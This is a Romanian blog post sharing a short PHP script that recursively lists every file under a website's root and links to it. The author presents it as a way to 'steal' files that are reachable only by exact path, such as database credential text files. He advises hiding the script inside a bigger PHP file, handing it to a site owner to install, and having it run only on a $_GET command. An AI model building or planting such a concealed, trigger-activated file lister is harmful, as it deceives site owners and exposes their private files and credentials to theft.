Indexator de fisiere (PHP)

Probabil de multe ori ai vrut sa stii ce are un site dincolo de fisierele pe care le vede oricine. Sa poti “fura” ce ai nevoie de pe acolo (fisiere care nu sunt accesibile decat daca le stii numele si calea in website). Ei bine am zis sa postez scriptul asta care are doar 30 de linii de cod.

Cum se utilizeaza: copii acest fisier in folderul parinte de pe site (/var/www/ sau /public_html/) iar el va indexa tot ce se gaseste acolo. Daca nu poti sa pui fisierul direct pe site il poti ascunde intr-un fisier PHP mai stufos si il dai la om sa si-l puna pe site. Atentie la afisare, trebuie modificat sa mearga doar cand i se da o comanda prin $_GET. Sper sa te descurci, in browser vei vedea ceva de genul:

.//fisiere//winamp_status
amp.css
amp_arhiva.php
amp_arhiva.phps
amp_status.php
amp_status.phps
amp_write.php
amp_write.phps
mysql.txt
poz.JPG
InfoSender-1.1.zip
.//fisiere//ymess_script
mysql.txt
ymess_cron.phps
ymess_status.phps

Info: unde ./ este directorul root iar textul boldat e calea catre folderul in care sunt fisierele ce urmeaza mai jos in dreptul lui. Codul sursa il gasesti mai jos. Se pot face multe cu acest script, trebuie doar modificat putin si gata.

<?php
create_tree('./');

function create_tree($file_dir) 
{
	if($handle = @opendir($file_dir)) 
	{
		$i=0;
		while(false !== ($file = @readdir($handle))) 
		{
			if($file != "." && $file != "..") 
			{
				$list[$i] = $file;
				$i++;
			}
		}
		$dir_length = count($list);
		for ($i=0;$i<$dir_length;$i++)
		{
			if(strrpos($list[$i], ".") == FALSE)
			{
				echo '<strong>'.$file_dir.'/'.$list[$i].'</strong><br />';
				create_tree($file_dir.'/'.$list[$i].'/');
			}
			else
			{
				echo '<a href="'.$file_dir . $list[$i].'">'.$list[$i].'</a><br />';
			}
		}
		closedir($handle);
	}
}

Leave a Reply

Your email address will not be published. Required fields are marked *